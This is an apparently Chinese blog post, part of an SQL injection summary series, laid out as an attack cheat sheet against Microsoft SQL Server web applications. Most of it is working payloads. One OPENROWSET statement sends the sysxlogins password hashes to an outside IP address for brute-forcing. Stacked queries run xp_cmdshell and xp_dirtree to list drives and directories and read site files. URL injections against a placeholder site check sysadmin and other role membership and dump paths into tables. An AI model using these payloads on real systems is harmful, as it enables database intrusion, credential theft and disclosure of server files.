SQL注射总结(7)

最新推荐文章于 2025-12-03 12:12:23 发布
原创 最新推荐文章于 2025-12-03 12:12:23 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #insert #table #network #c #dos

博客展示了一系列SQL插入操作,包括向OPENROWSET插入数据、创建临时表并插入驱动器、子目录等信息,还给出了验证服务器角色成员权限的语句,以及将路径写入表中的相关SQL语句。
部署运行你感兴趣的模型镜像
3、 复制哈西表(HASH)

  这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins


  得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。

  遍历目录的方法:
  先创建一个临时表:temp

'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动
5';insert into temp(id) exec master.dbo.xp_subdirs 'c:/';-- 获得子目录列表
5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 获得所有子目录的目录树结构,并寸入temp表中

5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- 查看某个文件的内容
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc'

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- (xp_dirtree适用权限PUBLIC)
写入表:
语句1:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
语句2:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
语句3:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
语句4:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句5:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句6:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
语句7:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句8:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句9:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--
把路径写到表中去:
_blank>http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree 'c:/'-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:/web'--
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-

关键字:软件  服务器  qq  os  msn  dos   美女 电影 小说 音乐 无极 汽车 MP3

您可能感兴趣的与本文相关的镜像

Kotaemon

Kotaemon

AI应用

Kotaemon 是由Cinnamon 开发的开源项目,是一个RAG UI页面,主要面向DocQA的终端用户和构建自己RAG pipeline

SQL注射语句的经典总结.docx
01-13
以下是对SQL注入语句的经典总结: 1. **判断注入点**:通常使用`' ; and 1=1`与`' ; and 1=2`组合,如果页面返回相同,说明可能存在注入点,因为两个语句在逻辑上等价,不会改变原SQL语句的结果。 2. **猜表名**:...
SQL注射技术总结文档
01-02
### SQL注射技术总结文档 #### 一、简介 SQL注射是一种常见的网络安全攻击手段,通过将恶意的SQL代码插入到正常的数据请求中,攻击者能够控制数据库执行非授权操作。随着Web应用的普及和发展,SQL注射成为了针对...
4.7.5.3-测试 SQL Server
qq_44232452的博客
10-19 221
所有描述 SOLServer 安全最佳实践的书和论文都建议在SQLServer2000中禁用(在SOLServer2005中,它默认为禁用)。但是,如果我们有系统管理员权限(原生或通过暴力破解系统管理员密码,见下文),我们通常可以绕过此限制。如果已被禁用,我们只需注入以下代码:如果前面的代码不起作用,这意味着已被移动或删除。在这种情况下,我们需要注入以下代码:这段代码由 Antonin Foller编写(参见页面底部的链接),它使用和(当然,只要它们没有被禁用)创建了一个新的。
SQL注入(1)
banying4311的博客
08-06 840
一、注入点的判断及猜解1.加入单引号 ’提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞。2.数字型判断是否有注入;语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型)结果:分别返回不同的页面,说明存在注入漏洞.分析:and 的意思是“和”如果没有过滤我们的语句,and 1=1就会被代入SQL查询语句进行查询,如果and前后的两条语句都是真的话就不会...
SQL旁注精华珍藏版代码.doc
05-30
SQL旁注精华珍藏版代码.doc SQL旁注精华珍藏版代码.doc
深入浅出SQL注入
爱技术 爱生活
11-11 2913
之前在做学生信息管理系统和机房收费系统的时候,对于SQL注入的问题已经是司空见惯,但是并没有真正的地形象生动的理解SQL注入到底是什么玩意儿.直到这次做牛腩才在牛老师的举例之下,明白了原来SQL注入是真的很危险啊. 问题提出     我们先来构造一个简单的添加新闻类别的程序,在动态网页上添加一个TextBox控件,一个Button控件,一个GridView控件。布局如下图所示: 然后
37. 注入篇——旁注
Fly_鹏程万里
03-10 2678
旁注简介旁注是互联网黑客入侵常见的一种手段,多数用来攻击虚拟主机。其原理是利用统一主机上其他站点的安全漏洞获取服务器上的一个WEBshell,从而获得一定的操作权限,进而利用虚拟目录权限的配置不严格或者通过“提权”来获取管理员权限后在跳转到目标网站的web虚拟目录中。同一台服务器入侵由于现在互联网的发展,使更多的人都拥有自己的网站。但是如果自己买服务器,买带宽的话就会花费很多钱,这样长久下去的资金...
Sql注入(盲注)
永不垂头的博客
07-29 341
学习笔记—Sql注入(盲注) 一、盲注实践: select * from users where (id = 1) and 1<(select count() xxx) – and pid > 100; select * from users where (id = 1) and (1<(select count() xxx)); – and pid > 100; select * from users where (id = 1) and 1<(select count
SQL注入问题总结
mmdev
03-19 428
一、SQL注入介绍 SQL注入就是将原本的SQL语句的逻辑结构改变,使得SQL语句的执行结果和原本开发者的意图不一样; 方法:在表单中将命令当作用户输入提交给程序; 二、SQL注入范例 这里我们根据用户登录页面 &lt;form action="" &gt; 用户名:&lt;input type="text" name="username"&gt;&lt;br/&..
Sql注射总结.rar
07-09
本资料“Sql注射总结”是针对这一主题的详细教程,旨在帮助读者理解和防范SQL注入攻击。 首先,了解SQL注入的基础原理至关重要。当用户输入的数据未经充分验证或转义就被拼接到SQL查询语句中,就可能导致SQL注入...
[翻译]SQL注射技术总结文档.7z
08-21
====||目录||===== -------------------- 1、简介 ...7、MYSQL利用 8、服务名和配置 9、在注册表中找VNC密码 10、刺穿IDS认证 11、在MYSQL中使用char()欺骗 12、用注释躲避IDS认证 13、构造无引号的字符串
SQL注射技术全方位总结与实践指南
### SQL注射技术总结 #### 1. 简介 SQL注射SQL Injection)是一种针对数据库的攻击技术,攻击者通过在SQL语句中注入恶意SQL代码片段,从而对数据库进行未授权的查询或操作。这种技术通常用于攻击数据驱动的应用...
SQL旁注精华珍藏版代码
ljhmover的专栏
06-02 833
这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下: insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;, ...这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogi
SQL注入原理(预习作业)转载学习内容
qq_43473164的博客
03-17 678
Sql注入原理 程序员在web开发时,没有过滤敏感字符,绑定变量,导致攻击者可以通过sql灵活多变的语法,构造精心巧妙的语句,不择手段,达成目的,或者通过系统报错,返回对自己有用的信息。 Sql注入环境 需要用到的工具有:apache,mysql,php ,这几个组件可以单独下载安装,不过安装配置过程较为繁琐,还是建议新手直接从网上下载phpstudy ,一个绿色程序,包含上述三个组件,傻瓜化操作...
让你彻底明白sql注入攻击
方志朋的博客
01-06 384
点击上方蓝色“方志朋”,选择“设为星标”回复“666”获取独家整理的学习资料!SQL注入攻击是黑客对数据库进行攻击常用的手段之一,随着B/S模式应用开发的发展,使用这种模式编写应用程序的程...
旁注原理
weixin_33797791的博客
03-11 487
  旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。   介绍 旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的...
旁 注 攻 击
weixin_46273733的博客
01-23 3693
旁注攻击 旁注攻击即攻击者在攻击目标时,对目标网站“无从下手”,找不到漏洞时,攻击者就可能会通过具有同一服务器的网站渗透到目标网站,从而获取目标站点的权限。 服务器端Web架构 Web应用程序与数据库 当攻击者在攻击“xxser.com”时,并未发现风险,但通过攻击“secbug.org”得到了数据库的root 权限,这样“xxser.com”的数据可能会被泄露 IP逆向查询 许多网站都提供了基于P到网站的逆向查询功能,通过这类网站攻击者可以查找到部署在同一 Web
什么是旁注?
0ffs3t
10-27 2506
旁注的词典解释是1.正文旁边的小注、2.在书页边上的手写或印刷的注释、3.从旁边流入、4.普降。旁注的计算机术语就是通过目标网站所在的主机上存放的其他网站进行注入攻击的方法。 纠错 编辑摘要 旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。以
提升文本转SQL(Text-to-SQL)精准度的实践指南
最新发布
这里是一位在代码世界深耕多年的 “老江湖” 的自留地。​ 岁月在履历上添了厚度,却没磨掉敲代码时眼里的光。从调试第一行 hello world 的生涩,到架构复杂系统的从容,那些在键盘敲击声里流过的日夜,都想在这里慢慢梳理
12-03 706
提升Text-to-SQL精准度是一个“全链路优化”问题,需从用户输入解析、Schema理解、上下文管理到SQL验证形成闭环。结合本文介绍的策略——优化NLU模块减少歧义、增强Schema语义理解、引入上下文感知机制、构建反馈闭环——可显著提升系统的实用性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值